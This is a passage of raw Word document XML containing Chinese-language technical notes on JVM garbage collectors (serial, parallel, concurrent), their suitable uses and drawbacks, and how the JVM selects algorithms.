          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-XX:+UseConcMarkSweepGC</w:t>
      </w:r>
      <w:r w:rsidR="004F26F1">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>打开。</w:t>
      </w:r>
      <w:r w:rsidR="004F26F1">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00722048" w:rsidRDefault="00722048" w:rsidP="00BB0383">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00722048" w:rsidRPr="00F41A4C" w:rsidRDefault="00722048" w:rsidP="00BB0383">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>串行处理器：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>适用情况：数据量比较小（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>100M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>左右）；单处理器下并且对响应时间无要求的应用。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>缺点：只能用于小型应用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>并行处理器：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>适用情况：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对吞吐量有高要求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、对应用响应时间无要求的中、大型应用。举例：后台处理、科学计算。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>缺点：应用响应时间可能较长</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>并发处理器：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>适用情况：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对响应时间有高要求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、对应用响应时间有较高要求的中、大型应用。举例：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应用服务器、电信交换、集成开发环境。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00551A52" w:rsidRDefault="00582C16" w:rsidP="002116B9">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.2.5</w:t>
      </w:r>
      <w:r w:rsidR="002116B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="002116B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>垃圾回收算法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002116B9" w:rsidRPr="002116B9" w:rsidRDefault="002116B9" w:rsidP="002116B9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002116B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="002116B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>垃圾回收算法可以分为三类，都基于标记</w:t>
      </w:r>
      <w:r w:rsidRPr="002116B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="002116B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>清除（复制）算法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002116B9" w:rsidRPr="002116B9" w:rsidRDefault="002116B9" w:rsidP="002116B9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="60" w:line="279" w:lineRule="atLeast"/>
        <w:ind w:left="322"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002116B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Serial</w:t>
      </w:r>
      <w:r w:rsidRPr="002116B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>算法（单线程）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002116B9" w:rsidRPr="002116B9" w:rsidRDefault="002116B9" w:rsidP="002116B9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="60" w:line="279" w:lineRule="atLeast"/>
        <w:ind w:left="322"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002116B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>并行算法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002116B9" w:rsidRPr="002116B9" w:rsidRDefault="002116B9" w:rsidP="002116B9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="60" w:line="279" w:lineRule="atLeast"/>
        <w:ind w:left="322"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002116B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>并发算法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002116B9" w:rsidRPr="002116B9" w:rsidRDefault="002116B9" w:rsidP="002116B9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002116B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>  JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="002116B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>会根据机器的硬件配置对每个内存代选择适合的回收算法，比如，如果机器多于</w:t>
      </w:r>
      <w:r w:rsidRPr="002116B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="002116B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>个核，会对年轻代选择并行算法，关于选择细节请参考</w:t>
      </w:r>
      <w:r w:rsidRPr="002116B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="002116B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>调优文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E0136" w:rsidRDefault="002116B9" w:rsidP="00C346A7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002116B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="002116B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
